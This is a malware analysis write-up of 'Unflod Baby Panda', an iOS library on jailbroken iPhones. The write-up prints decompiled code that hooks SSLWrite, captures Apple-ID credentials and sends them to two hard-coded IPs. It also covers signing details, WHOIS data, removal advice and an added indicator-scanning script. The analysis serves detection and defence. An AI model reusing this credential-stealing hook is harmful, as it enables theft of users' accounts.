iOS Malware Campaign "Unflod Baby Panda"

SektionEins did a quick and dirty analysis of Unflod.dylib, which is part of an iOS malware campaign targeting jailbroken iPhones.


Introduction

On 17th April 2014 a malware campaign targeting users of jailbroken iPhones was discovered and discussed by reddit users. This malware appears to be of Chinese origin and comes as a library called Unflod.dylib that hooks into all running processes of jailbroken iDevices and listens to outgoing SSL connections. From these connections it tries to steal the device's Apple-ID and corresponding password and sends them in plaintext to servers whose IP addresses belong to US hosting companies, apparently serving Chinese customers.

Users of reddit have made this malware available to the public, which allowed SektionEins to perform an analysis of this threat.

However, so far only the malware itself has been found, and it is still unknown how it ends up on jailbroken phones. Rumours that Chinese piracy repositories are involved are so far unverified.

Meanwhile it has been discovered that framework.dylib is another name under which the same threat has been found in other infections.

The Binary

The malware comes as a Mach-O ARMv7 dynamic library called Unflod.dylib (or framework.dylib) that is installed as a MobileSubstrate extension at the path:

/Library/MobileSubstrate/DynamicLibraries/Unflod.dylib

It has been suggested that the choice of name might have something to do with the existence of a real tweak called Unfold. The name might therefore just be an attempt to hide in plain sight.

While analysing the binary, SektionEins found that it contains strings hinting that the threat was compiled with Xcode on a Mac OS X system. In fact, the following string was found inside the Mach-O header as the name of the library during compilation.

/Users/apple/Library/Developer/Xcode/DerivedData/framework-guknhpkmreoccjbplfeebcklivmx/Build/Products/Debug-iphoneos/framework.app/framework

This string reveals that the project name during compilation was "framework.app" and that it was compiled by a user called "apple". Further information inside the Mach-O header seems to indicate that the binary was compiled against the iOS 6.1 SDK.

During our analysis it was also discovered that the threat is digitally signed with an iPhone developer certificate, as can be seen below.

$ codesign -vvvv -d Unflod.dylib
Executable=./Unflod.dylib
Identifier=com.your.framework
Format=Mach-O thin (armv7)
CodeDirectory v=20100 size=227 flags=0x0(none) hashes=3+5 location=embedded
Hash type=sha1 size=20
CDHash=da792624675e82b3460b426f869fbe718abea3f9
Signature size=4322
Authority=iPhone Developer: WANG XIN (P5KFURM8M8)
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Signed Time=14 Feb 2014 04:32:58
Info.plist=not bound
Sealed Resources=none
Internal requirements count=2 size=484

As you can see above, the developer certificate issued by Apple is registered to a person called WANG XIN. This person might be a fake persona, the victim of certificate theft or really involved. It is impossible for us to know, but Apple should be able to investigate from this information and terminate that developer account.

Furthermore, the signature date is the 14th of February of this year, which hints at this threat having been around for a short while without being discovered.

It is important to remember that this threat only affects jailbroken iPhones; the signature on the binary is therefore not required for the malware to work at all. The fact that it is still there is either an oversight or deliberate misinformation by the attacker.

The Code

The malicious code itself is not very big. Everything is contained inside one function called replace_SSLWrite, which decompiles as shown below.

int __fastcall replace_SSLWrite(int a1, char *a2, int a3, int a4)
{
  int v4; // r3@11
  int v5; // ST28_4@14
  size_t v6; // ST24_4@14
  int v7; // ST10_4@18
  size_t v8; // ST0C_4@18
  struct sockaddr v10; // [sp+40h] [bp-60h]@16
  ssize_t v11; // [sp+50h] [bp-50h]@14
  int v12; // [sp+54h] [bp-4Ch]@14
  struct sockaddr v13; // [sp+58h] [bp-48h]@12
  ssize_t v14; // [sp+68h] [bp-38h]@10
  int v15; // [sp+6Ch] [bp-34h]@10
  char *v16; // [sp+70h] [bp-30h]@7
  char *v17; // [sp+74h] [bp-2Ch]@5
  char *v18; // [sp+78h] [bp-28h]@5
  char *v19; // [sp+7Ch] [bp-24h]@2
  int v20; // [sp+80h] [bp-20h]@1
  int v21; // [sp+84h] [bp-1Ch]@1
  char *v22; // [sp+88h] [bp-18h]@1
  int v23; // [sp+8Ch] [bp-14h]@1
  int v24; // [sp+90h] [bp-10h]@11
  int v25; // [sp+94h] [bp-Ch]@1

  v25 = __stack_chk_guard;
  v23 = a1;
  v22 = a2;
  v21 = a3;
  v20 = a4;
  if ( !findhead )
  {
    v19 = strstr(v22, "/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1");
    if ( v19 )
    {
      findhead = 1;
      strcpy(content, v22);
    }
  }
  if ( findhead == 1 )
  {
    v18 = strstr(v22, "<key>appleId</key>");
    v17 = strstr(v22, "<key>password</key>");
    if ( v18 )
    {
      if ( v17 )
      {
        strcat(content, v22);
        v16 = strstr(content, "</plist>");
        if ( v16 && v16 - content <= 2040 )
          v16[8] = 0;
        v14 = 0;
        v15 = socket(2, 1, 0);
        if ( v15 < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v13.sa_family = 2;
        *(_WORD *)&v13.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v13.sa_data[2] = inet_addr("23.88.10.4");
        if ( connect(v15, &v13, 0x10u) < 0 )
        {
          close(v15);
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v5 = v15;
        v6 = strlen(content);
        v14 = write(v5, content, v6);
        v11 = 0;
        close(v15);
        v12 = socket(2, 1, 0);
        if ( v12 < 0 )
        {
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v10.sa_family = 2;
        *(_WORD *)&v10.sa_data[0] = 0xC61Eu;
        *(_DWORD *)&v10.sa_data[2] = inet_addr("23.228.204.55");
        if ( connect(v12, &v10, 0x10u) < 0 )
        {
          close(v12);
          v24 = pSSLWrite(v23, v22, v21, v20);
          goto LABEL_20;
        }
        v7 = v12;
        v8 = strlen(content);
        v11 = write(v7, content, v8);
        close(v12);
        findhead = 2;
      }
    }
  }
  v24 = pSSLWrite(v23, v22, v21, v20);
LABEL_20:
  if ( __stack_chk_guard != v25 )
    __stack_chk_fail(__stack_chk_guard, v24, v25, v4);
  return v24;
}

The malware hooks SSLWrite of the Security.framework and scans the outgoing buffer for the MZFinance authenticate request and the appleId/password plist keys that indicate the presence of the Apple-ID and its password. If those are found, the code attempts to connect to the IPs 23.88.10.4 and 23.228.204.55 on TCP port 7878 (0x1EC6, which appears as the little-endian word 0xC61E in the decompilation) and writes the captured request out in plaintext.
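As an added example (not part of the SektionEins analysis), the following Python script scans a file for the indicator strings named above and decodes the hard-coded port from the sockaddr word seen in the decompilation; the sample bytes are constructed here, and the indicator names are our own.

```python
import struct

# Indicator strings taken from the decompiled replace_SSLWrite and from the
# Mach-O header discussed above (names are ours).
INDICATORS = {
    "mzfinance-auth-path": b"/WebObjects/MZFinance.woa/wa/authenticate",
    "appleid-key": b"<key>appleId</key>",
    "password-key": b"<key>password</key>",
    "c2-ip-1": b"23.88.10.4",
    "c2-ip-2": b"23.228.204.55",
    "build-path": b"/Users/apple/Library/Developer/Xcode/DerivedData/framework-",
}

def sockaddr_port(word_le: int) -> int:
    """The decompilation stores the port as the little-endian 16-bit word
    0xC61E in sockaddr.sa_data[0..1]; on the wire the same bytes are read
    big-endian, which yields the real port number."""
    return struct.unpack(">H", struct.pack("<H", word_le))[0]

def scan_for_indicators(data: bytes) -> dict:
    """Return {indicator name: byte offset} for every indicator present."""
    hits = {}
    for name, needle in INDICATORS.items():
        off = data.find(needle)
        if off != -1:
            hits[name] = off
    return hits

def classify(hits: dict) -> str:
    # The hard-coded C2 addresses are specific enough on their own; the
    # MZFinance path and the plist keys also occur in legitimate software,
    # so they only count together.
    if "c2-ip-1" in hits or "c2-ip-2" in hits:
        return "match: Unflod/framework.dylib indicators"
    if {"mzfinance-auth-path", "appleid-key", "password-key"}.issubset(hits):
        return "suspicious: credential-harvesting strings"
    return "clean"

def scan_file(path: str) -> str:
    """Classify a dylib on disk, e.g. one found under
    /Library/MobileSubstrate/DynamicLibraries/ on a jailbroken device."""
    with open(path, "rb") as fh:
        return classify(scan_for_indicators(fh.read()))

# Constructed sample: a fake binary image carrying several of the indicators.
SAMPLE = (b"\xcf\xfa\xed\xfe" + b"\x00" * 16
          + b"/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1\x00"
          + b"<key>appleId</key>\x00<key>password</key>\x00"
          + b"23.88.10.4\x0023.228.204.55\x00")

if __name__ == "__main__":
    print("exfiltration port:", sockaddr_port(0xC61E))
    found = scan_for_indicators(SAMPLE)
    print(classify(found), found)
```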

The IPs

At the time of writing only the first IP still seems to accept connections on port 7878. Looking up this IP in the WHOIS database reveals the following information.

NetRange:       23.88.0.0 - 23.89.255.255
CIDR:           23.88.0.0/15
OriginAS:       AS18978
NetName:        ENZUINC-US-BLK12
NetHandle:      NET-23-88-0-0-1
Parent:         NET-23-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-06-07
Updated:        2013-06-07
Ref:            http://whois.arin.net/rest/net/NET-23-88-0-0-1


OrgName:        Enzu Inc
OrgId:          ENZUI
Address:        2360 Corporate Circle
Address:        Suite 400
City:           Henderson
StateProv:      NV
PostalCode:     89074
Country:        US
RegDate:        2010-02-24
Updated:        2012-04-25
Comment:        --------------------------------
Comment:        Enzu Inc.
Comment:        2360 Corporate Circle Suite 400
Comment:        Henderson, NV 89074
Comment:        https://www.enzu.com
Comment:        --------------------------------
Comment:        Please send all Abuse, Trademark,
Comment:        Legal Compliance, and Law Enforcement
Comment:        requests to abuse@scalabledns.com
Ref:            http://whois.arin.net/rest/org/ENZUI

ReferralServer: rwhois://rwhois.scalabledns.com:4321

OrgTechHandle: NETWO3674-ARIN
OrgTechName:   Network Operations
OrgTechPhone:  +1-702-965-1615
OrgTechEmail:
OrgTechRef:    http://whois.arin.net/rest/poc/NETWO3674-ARIN

OrgAbuseHandle: ABUSE2868-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-702-965-1615
OrgAbuseEmail:
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE2868-ARIN

OrgNOCHandle: NETWO3674-ARIN
OrgNOCName:   Network Operations
OrgNOCPhone:  +1-702-965-1615
OrgNOCEmail:
OrgNOCRef:    http://whois.arin.net/rest/poc/NETWO3674-ARIN

== Additional Information From rwhois://rwhois.scalabledns.com:4321 ==

%rwhois V-1.5:003fff:00 rwhois.scalabledns.com (by Network Solutions, Inc. V-1.5.9.5)
Network:Class-Name:Network
Network:ID:CID-10648
Network:Auth-Area:23.88.0.0/15
Network:Network-Name:ENZUINC-23.88.10.0/25
Network:IP-Network:23.88.10.0/25
Network:IP-Network-Block:23.88.10.0 - 23.88.10.127
Network:Org-ID;I:ORG-10648
Network:Org-Name;I:ORG-10648
Network:Tech-Contact;I:CID-10648
Network:Admin-Contact;I:CID-10648
Network:Create:20120425
Network:Update:20140401
Network:UpdatedBy:

Network:Class-Name:Network
Network:ID:CID-6853
Network:Auth-Area:23.88.0.0/15
Network:Network-Name:ENZUINC-23.88.10.0/24
Network:IP-Network:23.88.10.0/24
Network:IP-Network-Block:23.88.10.0 - 23.88.10.255
Network:Org-ID;I:ORG-6853
Network:Org-Name;I:ORG-6853
Network:Tech-Contact;I:CID-6853
Network:Admin-Contact;I:CID-6853
Network:Create:20120425
Network:Update:20130919
Network:UpdatedBy:

The second IP, which no longer seems to accept connections on port 7878, reveals the following information.

NetRange:       23.228.192.0 - 23.228.255.255
CIDR:           23.228.192.0/18
OriginAS:       AS40676
NetName:        PSYCHZ-NETWORKS
NetHandle:      NET-23-228-192-0-1
Parent:         NET-23-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-09-19
Updated:        2013-09-19
Ref:            http://whois.arin.net/rest/net/NET-23-228-192-0-1

OrgName:        Psychz Networks
OrgId:          PS-184
Address:        20687-2 Amar Road #312
City:           Walnut
StateProv:      CA
PostalCode:     91789
Country:        US
RegDate:        2013-04-17
Updated:        2013-09-05
Ref:            http://whois.arin.net/rest/org/PS-184

ReferralServer: rwhois://rwhois.psychz.net:4321

OrgAbuseHandle: NOC3077-ARIN
OrgAbuseName:   NOC
OrgAbusePhone:  +1-626-549-2801
OrgAbuseEmail:
OrgAbuseRef:    http://whois.arin.net/rest/poc/NOC3077-ARIN

OrgTechHandle: NOC3077-ARIN
OrgTechName:   NOC
OrgTechPhone:  +1-626-549-2801
OrgTechEmail:
OrgTechRef:    http://whois.arin.net/rest/poc/NOC3077-ARIN

== Additional Information From rwhois://rwhois.psychz.net:4321 ==

%rwhois V-1.0,V-1.5:00090h:00 portal.psychz.net (Ubersmith RWhois Server V-2.4.0)
autharea=23.228.192.0/18
xautharea=23.228.192.0/18
network:Class-Name:network
network:Auth-Area:23.228.192.0/18
network:ID:NET-16983.23.228.204.0/25
network:Network-Name:23.228.204.0/25
network:IP-Network:23.228.204.0/25
network:IP-Network-Block:23.228.204.0 - 23.228.204.127
network:Org-Name:znznet
network:Street-Address:辽宁沈阳和平区5-1-1
network:City:沈阳
network:State:辽宁
network:Postal-Code:
network:Country-Code:CN
network:Tech-Contact:MAINT-16983.23.228.204.0/25
network:Created:20131205052358000
network:Updated:20131205052358000
network:Updated-By:
contact:POC-Name:Network Administrator
contact:POC-Email:
contact:POC-Phone:
contact:Tech-Name:Network Administrator
contact:Tech-Email:
contact:Tech-Phone:

As you can see, at least the second IP has some connection to China.

Removal

Currently the jailbreak community believes that deleting the Unflod.dylib/framework.dylib binary and changing the Apple-ID's password afterwards is enough to recover from this attack. However, it is still unknown how the dynamic library ends up on the device in the first place, and therefore it is also unknown whether it comes with additional malware gifts.

We therefore believe that the only safe way of removal is a full restore, which means the removal and loss of the jailbreak.

Final Words

As you can see, this is a quick and dirty analysis of the threat that shows several indicators that a Chinese party is involved. It is however unclear at the moment how the actual malware binaries end up on jailbroken iPhones.

If you have further information about this threat that you would like to share with us or want to enquire about our services don't hesitate to contact us at info@sektioneins.de.